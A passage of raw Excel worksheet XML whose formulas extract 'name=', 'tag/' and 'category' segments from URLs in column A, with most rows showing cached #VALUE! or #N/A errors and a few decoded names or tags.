        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C51" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D51" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E51" t="e" cm="1">
        <f t="array" ref="E51">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A51)), MID($A51, FIND("name=",$A51) + 5, LEN($A51) - FIND("name=",$A51)),
    ISNUMBER(FIND("tag/",$A51)), MID($A51, FIND("tag/",$A51) + 4, LEN($A51) - FIND("tag/",$A51)),
    ISNUMBER(FIND("category",$A51)), MID($A51, FIND("category",$A51) + 9, LEN($A51) - FIND("category",$A51)))</f>
        <v>#N/A</v>
      </c>
      <c r="F51" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A52" t="s">
        <v>2248</v>
      </c>
      <c r="B52" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C52" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D52" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E52" t="e" cm="1">
        <f t="array" ref="E52">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A52)), MID($A52, FIND("name=",$A52) + 5, LEN($A52) - FIND("name=",$A52)),
    ISNUMBER(FIND("tag/",$A52)), MID($A52, FIND("tag/",$A52) + 4, LEN($A52) - FIND("tag/",$A52)),
    ISNUMBER(FIND("category",$A52)), MID($A52, FIND("category",$A52) + 9, LEN($A52) - FIND("category",$A52)))</f>
        <v>#N/A</v>
      </c>
      <c r="F52" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A53" t="s">
        <v>2273</v>
      </c>
      <c r="B53" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C53" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D53" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E53" t="e" cm="1">
        <f t="array" ref="E53">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A53)), MID($A53, FIND("name=",$A53) + 5, LEN($A53) - FIND("name=",$A53)),
    ISNUMBER(FIND("tag/",$A53)), MID($A53, FIND("tag/",$A53) + 4, LEN($A53) - FIND("tag/",$A53)),
    ISNUMBER(FIND("category",$A53)), MID($A53, FIND("category",$A53) + 9, LEN($A53) - FIND("category",$A53)))</f>
        <v>#N/A</v>
      </c>
      <c r="F53" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A54" t="s">
        <v>2260</v>
      </c>
      <c r="B54" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C54" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D54" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E54" t="e" cm="1">
        <f t="array" ref="E54">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A54)), MID($A54, FIND("name=",$A54) + 5, LEN($A54) - FIND("name=",$A54)),
    ISNUMBER(FIND("tag/",$A54)), MID($A54, FIND("tag/",$A54) + 4, LEN($A54) - FIND("tag/",$A54)),
    ISNUMBER(FIND("category",$A54)), MID($A54, FIND("category",$A54) + 9, LEN($A54) - FIND("category",$A54)))</f>
        <v>#N/A</v>
      </c>
      <c r="F54" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A55" t="s">
        <v>2262</v>
      </c>
      <c r="B55" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C55" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D55" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E55" t="e" cm="1">
        <f t="array" ref="E55">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A55)), MID($A55, FIND("name=",$A55) + 5, LEN($A55) - FIND("name=",$A55)),
    ISNUMBER(FIND("tag/",$A55)), MID($A55, FIND("tag/",$A55) + 4, LEN($A55) - FIND("tag/",$A55)),
    ISNUMBER(FIND("category",$A55)), MID($A55, FIND("category",$A55) + 9, LEN($A55) - FIND("category",$A55)))</f>
        <v>#N/A</v>
      </c>
      <c r="F55" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A56" t="s">
        <v>2260</v>
      </c>
      <c r="B56" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C56" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D56" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E56" t="e" cm="1">
        <f t="array" ref="E56">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A56)), MID($A56, FIND("name=",$A56) + 5, LEN($A56) - FIND("name=",$A56)),
    ISNUMBER(FIND("tag/",$A56)), MID($A56, FIND("tag/",$A56) + 4, LEN($A56) - FIND("tag/",$A56)),
    ISNUMBER(FIND("category",$A56)), MID($A56, FIND("category",$A56) + 9, LEN($A56) - FIND("category",$A56)))</f>
        <v>#N/A</v>
      </c>
      <c r="F56" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A57" t="s">
        <v>2274</v>
      </c>
      <c r="B57" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C57" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D57" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E57" t="e" cm="1">
        <f t="array" ref="E57">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A57)), MID($A57, FIND("name=",$A57) + 5, LEN($A57) - FIND("name=",$A57)),
    ISNUMBER(FIND("tag/",$A57)), MID($A57, FIND("tag/",$A57) + 4, LEN($A57) - FIND("tag/",$A57)),
    ISNUMBER(FIND("category",$A57)), MID($A57, FIND("category",$A57) + 9, LEN($A57) - FIND("category",$A57)))</f>
        <v>#N/A</v>
      </c>
      <c r="F57" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A58" t="s">
        <v>2274</v>
      </c>
      <c r="B58" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C58" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D58" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E58" t="e" cm="1">
        <f t="array" ref="E58">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A58)), MID($A58, FIND("name=",$A58) + 5, LEN($A58) - FIND("name=",$A58)),
    ISNUMBER(FIND("tag/",$A58)), MID($A58, FIND("tag/",$A58) + 4, LEN($A58) - FIND("tag/",$A58)),
    ISNUMBER(FIND("category",$A58)), MID($A58, FIND("category",$A58) + 9, LEN($A58) - FIND("category",$A58)))</f>
        <v>#N/A</v>
      </c>
      <c r="F58" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A59" t="s">
        <v>2260</v>
      </c>
      <c r="B59" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C59" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D59" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E59" t="e" cm="1">
        <f t="array" ref="E59">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A59)), MID($A59, FIND("name=",$A59) + 5, LEN($A59) - FIND("name=",$A59)),
    ISNUMBER(FIND("tag/",$A59)), MID($A59, FIND("tag/",$A59) + 4, LEN($A59) - FIND("tag/",$A59)),
    ISNUMBER(FIND("category",$A59)), MID($A59, FIND("category",$A59) + 9, LEN($A59) - FIND("category",$A59)))</f>
        <v>#N/A</v>
      </c>
      <c r="F59" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A60" t="s">
        <v>2274</v>
      </c>
      <c r="B60" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C60" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D60" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E60" t="e" cm="1">
        <f t="array" ref="E60">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A60)), MID($A60, FIND("name=",$A60) + 5, LEN($A60) - FIND("name=",$A60)),
    ISNUMBER(FIND("tag/",$A60)), MID($A60, FIND("tag/",$A60) + 4, LEN($A60) - FIND("tag/",$A60)),
    ISNUMBER(FIND("category",$A60)), MID($A60, FIND("category",$A60) + 9, LEN($A60) - FIND("category",$A60)))</f>
        <v>#N/A</v>
      </c>
      <c r="F60" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A61" t="s">
        <v>2264</v>
      </c>
      <c r="B61" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C61" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D61" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E61" t="e" cm="1">
        <f t="array" ref="E61">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A61)), MID($A61, FIND("name=",$A61) + 5, LEN($A61) - FIND("name=",$A61)),
    ISNUMBER(FIND("tag/",$A61)), MID($A61, FIND("tag/",$A61) + 4, LEN($A61) - FIND("tag/",$A61)),
    ISNUMBER(FIND("category",$A61)), MID($A61, FIND("category",$A61) + 9, LEN($A61) - FIND("category",$A61)))</f>
        <v>#N/A</v>
      </c>
      <c r="F61" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A62" t="s">
        <v>2265</v>
      </c>
      <c r="B62" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C62" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D62" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E62" t="e" cm="1">
        <f t="array" ref="E62">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A62)), MID($A62, FIND("name=",$A62) + 5, LEN($A62) - FIND("name=",$A62)),
    ISNUMBER(FIND("tag/",$A62)), MID($A62, FIND("tag/",$A62) + 4, LEN($A62) - FIND("tag/",$A62)),
    ISNUMBER(FIND("category",$A62)), MID($A62, FIND("category",$A62) + 9, LEN($A62) - FIND("category",$A62)))</f>
        <v>#N/A</v>
      </c>
      <c r="F62" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A63" t="s">
        <v>2262</v>
      </c>
      <c r="B63" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C63" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D63" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E63" t="e" cm="1">
        <f t="array" ref="E63">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A63)), MID($A63, FIND("name=",$A63) + 5, LEN($A63) - FIND("name=",$A63)),
    ISNUMBER(FIND("tag/",$A63)), MID($A63, FIND("tag/",$A63) + 4, LEN($A63) - FIND("tag/",$A63)),
    ISNUMBER(FIND("category",$A63)), MID($A63, FIND("category",$A63) + 9, LEN($A63) - FIND("category",$A63)))</f>
        <v>#N/A</v>
      </c>
      <c r="F63" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A64" t="s">
        <v>2273</v>
      </c>
      <c r="B64" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C64" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D64" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E64" t="e" cm="1">
        <f t="array" ref="E64">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A64)), MID($A64, FIND("name=",$A64) + 5, LEN($A64) - FIND("name=",$A64)),
    ISNUMBER(FIND("tag/",$A64)), MID($A64, FIND("tag/",$A64) + 4, LEN($A64) - FIND("tag/",$A64)),
    ISNUMBER(FIND("category",$A64)), MID($A64, FIND("category",$A64) + 9, LEN($A64) - FIND("category",$A64)))</f>
        <v>#N/A</v>
      </c>
      <c r="F64" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A65" t="s">
        <v>2273</v>
      </c>
      <c r="B65" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C65" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D65" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E65" t="e" cm="1">
        <f t="array" ref="E65">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A65)), MID($A65, FIND("name=",$A65) + 5, LEN($A65) - FIND("name=",$A65)),
    ISNUMBER(FIND("tag/",$A65)), MID($A65, FIND("tag/",$A65) + 4, LEN($A65) - FIND("tag/",$A65)),
    ISNUMBER(FIND("category",$A65)), MID($A65, FIND("category",$A65) + 9, LEN($A65) - FIND("category",$A65)))</f>
        <v>#N/A</v>
      </c>
      <c r="F65" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A66" t="s">
        <v>2273</v>
      </c>
      <c r="B66" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C66" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D66" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E66" t="e" cm="1">
        <f t="array" ref="E66">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A66)), MID($A66, FIND("name=",$A66) + 5, LEN($A66) - FIND("name=",$A66)),
    ISNUMBER(FIND("tag/",$A66)), MID($A66, FIND("tag/",$A66) + 4, LEN($A66) - FIND("tag/",$A66)),
    ISNUMBER(FIND("category",$A66)), MID($A66, FIND("category",$A66) + 9, LEN($A66) - FIND("category",$A66)))</f>
        <v>#N/A</v>
      </c>
      <c r="F66" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A67" t="s">
        <v>2273</v>
      </c>
      <c r="B67" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C67" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D67" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E67" t="e" cm="1">
        <f t="array" ref="E67">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A67)), MID($A67, FIND("name=",$A67) + 5, LEN($A67) - FIND("name=",$A67)),
    ISNUMBER(FIND("tag/",$A67)), MID($A67, FIND("tag/",$A67) + 4, LEN($A67) - FIND("tag/",$A67)),
    ISNUMBER(FIND("category",$A67)), MID($A67, FIND("category",$A67) + 9, LEN($A67) - FIND("category",$A67)))</f>
        <v>#N/A</v>
      </c>
      <c r="F67" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A68" t="s">
        <v>2275</v>
      </c>
      <c r="B68" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C68" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D68" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E68" t="e" cm="1">
        <f t="array" ref="E68">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A68)), MID($A68, FIND("name=",$A68) + 5, LEN($A68) - FIND("name=",$A68)),
    ISNUMBER(FIND("tag/",$A68)), MID($A68, FIND("tag/",$A68) + 4, LEN($A68) - FIND("tag/",$A68)),
    ISNUMBER(FIND("category",$A68)), MID($A68, FIND("category",$A68) + 9, LEN($A68) - FIND("category",$A68)))</f>
        <v>#N/A</v>
      </c>
      <c r="F68" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A69" t="s">
        <v>2276</v>
      </c>
      <c r="B69" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C69" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D69" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E69" t="e" cm="1">
        <f t="array" ref="E69">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A69)), MID($A69, FIND("name=",$A69) + 5, LEN($A69) - FIND("name=",$A69)),
    ISNUMBER(FIND("tag/",$A69)), MID($A69, FIND("tag/",$A69) + 4, LEN($A69) - FIND("tag/",$A69)),
    ISNUMBER(FIND("category",$A69)), MID($A69, FIND("category",$A69) + 9, LEN($A69) - FIND("category",$A69)))</f>
        <v>#N/A</v>
      </c>
      <c r="F69" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A70" t="s">
        <v>2277</v>
      </c>
      <c r="B70" t="e">
        <f t="shared" ref="B70:B133" si="4">IF(FIND("name=",A70,1)&gt;0,MID(A70,FIND("name=",A70,1)+5,LEN(A70)-FIND("name=",A70,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C70" t="str">
        <f t="shared" ref="C70:C133" si="5">IF(FIND("tag/",$A70,1)&gt;0,MID($A70,FIND("tag/",$A70,1)+4,LEN($A70)-FIND("tag/",$A70,1)),"")</f>
        <v>body-positivity/</v>
      </c>
      <c r="D70" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E70" t="str" cm="1">
        <f t="array" ref="E70">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A70)), MID($A70, FIND("name=",$A70) + 5, LEN($A70) - FIND("name=",$A70)),
    ISNUMBER(FIND("tag/",$A70)), MID($A70, FIND("tag/",$A70) + 4, LEN($A70) - FIND("tag/",$A70)),
    ISNUMBER(FIND("category",$A70)), MID($A70, FIND("category",$A70) + 9, LEN($A70) - FIND("category",$A70)))</f>
        <v>body-positivity/</v>
      </c>
      <c r="F70" t="s">
        <v>3307</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A71" t="s">
        <v>2278</v>
      </c>
      <c r="B71" t="str">
        <f t="shared" si="4"/>
        <v>Ruhi%20Singh%2012</v>
      </c>
      <c r="C71" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D71" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E71" t="str" cm="1">
        <f t="array" ref="E71">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A71)), MID($A71, FIND("name=",$A71) + 5, LEN($A71) - FIND("name=",$A71)),
    ISNUMBER(FIND("tag/",$A71)), MID($A71, FIND("tag/",$A71) + 4, LEN($A71) - FIND("tag/",$A71)),
    ISNUMBER(FIND("category",$A71)), MID($A71, FIND("category",$A71) + 9, LEN($A71) - FIND("category",$A71)))</f>
        <v>Ruhi%20Singh%2012</v>
      </c>
      <c r="F71" t="s">
        <v>3308</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A72" t="s">
        <v>2278</v>
      </c>
      <c r="B72" t="str">
        <f t="shared" si="4"/>
        <v>Ruhi%20Singh%2012</v>
      </c>
      <c r="C72" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D72" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E72" t="str" cm="1">
        <f t="array" ref="E72">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A72)), MID($A72, FIND("name=",$A72) + 5, LEN($A72) - FIND("name=",$A72)),
    ISNUMBER(FIND("tag/",$A72)), MID($A72, FIND("tag/",$A72) + 4, LEN($A72) - FIND("tag/",$A72)),
    ISNUMBER(FIND("category",$A72)), MID($A72, FIND("category",$A72) + 9, LEN($A72) - FIND("category",$A72)))</f>
        <v>Ruhi%20Singh%2012</v>
      </c>
      <c r="F72" t="s">
        <v>3308</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A73" t="s">
        <v>2248</v>
      </c>
      <c r="B73" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C73" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D73" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E73" t="e" cm="1">
        <f t="array" ref="E73">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A73)), MID($A73, FIND("name=",$A73) + 5, LEN($A73) - FIND("name=",$A73)),
    ISNUMBER(FIND("tag/",$A73)), MID($A73, FIND("tag/",$A73) + 4, LEN($A73) - FIND("tag/",$A73)),
    ISNUMBER(FIND("category",$A73)), MID($A73, FIND("category",$A73) + 9, LEN($A73) - FIND("category",$A73)))</f>
        <v>#N/A</v>
      </c>
      <c r="F73" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A74" t="s">
        <v>2248</v>
      </c>
      <c r="B74" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C74" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D74" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E74" t="e" cm="1">
        <f t="array" ref="E74">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A74)), MID($A74, FIND("name=",$A74) + 5, LEN($A74) - FIND("name=",$A74)),
    ISNUMBER(FIND("tag/",$A74)), MID($A74, FIND("tag/",$A74) + 4, LEN($A74) - FIND("tag/",$A74)),
    ISNUMBER(FIND("category",$A74)), MID($A74, FIND("category",$A74) + 9, LEN($A74) - FIND("category",$A74)))</f>
        <v>#N/A</v>
      </c>
      <c r="F74" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A75" t="s">
        <v>2248</v>
      </c>
      <c r="B75" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C75" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D75" t="e">
        <f t="shared" ref="D75:D138" si="6">IF(FIND("category",$A75,1)&gt;0,MID($A75,FIND("category",$A75,1)+9,LEN($A75)-FIND("category",$A75,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E75" t="e" cm="1">
        <f t="array" ref="E75">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A75)), MID($A75, FIND("name=",$A75) + 5, LEN($A75) - FIND("name=",$A75)),
    ISNUMBER(FIND("tag/",$A75)), MID($A75, FIND("tag/",$A75) + 4, LEN($A75) - FIND("tag/",$A75)),
    ISNUMBER(FIND("category",$A75)), MID($A75, FIND("category",$A75) + 9, LEN($A75) - FIND("category",$A75)))</f>
        <v>#N/A</v>
      </c>
      <c r="F75" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A76" t="s">
        <v>2248</v>
      </c>
      <c r="B76" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C76" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D76" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E76" t="e" cm="1">
        <f t="array" ref="E76">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A76)), MID($A76, FIND("name=",$A76) + 5, LEN($A76) - FIND("name=",$A76)),
    ISNUMBER(FIND("tag/",$A76)), MID($A76, FIND("tag/",$A76) + 4, LEN($A76) - FIND("tag/",$A76)),
    ISNUMBER(FIND("category",$A76)), MID($A76, FIND("category",$A76) + 9, LEN($A76) - FIND("category",$A76)))</f>
        <v>#N/A</v>
      </c>
      <c r="F76" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A77" t="s">
        <v>2248</v>
      </c>
      <c r="B77" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C77" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D77" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E77" t="e" cm="1">
        <f t="array" ref="E77">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A77)), MID($A77, FIND("name=",$A77) + 5, LEN($A77) - FIND("name=",$A77)),
    ISNUMBER(FIND("tag/",$A77)), MID($A77, FIND("tag/",$A77) + 4, LEN($A77) - FIND("tag/",$A77)),
    ISNUMBER(FIND("category",$A77)), MID($A77, FIND("category",$A77) + 9, LEN($A77) - FIND("category",$A77)))</f>
        <v>#N/A</v>
      </c>
      <c r="F77" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A78" t="s">
        <v>2279</v>
      </c>
      <c r="B78" t="str">
        <f t="shared" si="4"/>
        <v>Sureet%20Kular</v>
      </c>
      <c r="C78" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D78" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E78" t="str" cm="1">
        <f t="array" ref="E78">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A78)), MID($A78, FIND("name=",$A78) + 5, LEN($A78) - FIND("name=",$A78)),
    ISNUMBER(FIND("tag/",$A78)), MID($A78, FIND("tag/",$A78) + 4, LEN($A78) - FIND("tag/",$A78)),
    ISNUMBER(FIND("category",$A78)), MID($A78, FIND("category",$A78) + 9, LEN($A78) - FIND("category",$A78)))</f>
        <v>Sureet%20Kular</v>
      </c>
      <c r="F78" t="s">
        <v>3309</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A79" t="s">
        <v>2280</v>
      </c>
      <c r="B79" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C79" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D79" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E79" t="e" cm="1">
        <f t="array" ref="E79">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A79)), MID($A79, FIND("name=",$A79) + 5, LEN($A79) - FIND("name=",$A79)),
    ISNUMBER(FIND("tag/",$A79)), MID($A79, FIND("tag/",$A79) + 4, LEN($A79) - FIND("tag/",$A79)),
    ISNUMBER(FIND("category",$A79)), MID($A79, FIND("category",$A79) + 9, LEN($A79) - FIND("category",$A79)))</f>
        <v>#N/A</v>
      </c>
      <c r="F79" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A80" t="s">
        <v>2248</v>
      </c>
      <c r="B80" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C80" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D80" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E80" t="e" cm="1">
        <f t="array" ref="E80">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A80)), MID($A80, FIND("name=",$A80) + 5, LEN($A80) - FIND("name=",$A80)),
    ISNUMBER(FIND("tag/",$A80)), MID($A80, FIND("tag/",$A80) + 4, LEN($A80) - FIND("tag/",$A80)),
    ISNUMBER(FIND("category",$A80)), MID($A80, FIND("category",$A80) + 9, LEN($A80) - FIND("category",$A80)))</f>
        <v>#N/A</v>
      </c>
      <c r="F80" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A81" t="s">
        <v>2281</v>
      </c>
      <c r="B81" t="e">
        <f t="shared" si="4"/>
        <v>#VALUE!</v>
      </c>
      <c r="C81" t="e">
        <f t="shared" si="5"/>
        <v>#VALUE!</v>
      </c>
      <c r="D81" t="e">
        <f t="shared" si="6"/>
        <v>#VALUE!</v>
      </c>
      <c r="E81" t="e" cm="1">
        <f t="array" ref="E81">_xlfn.IFS(
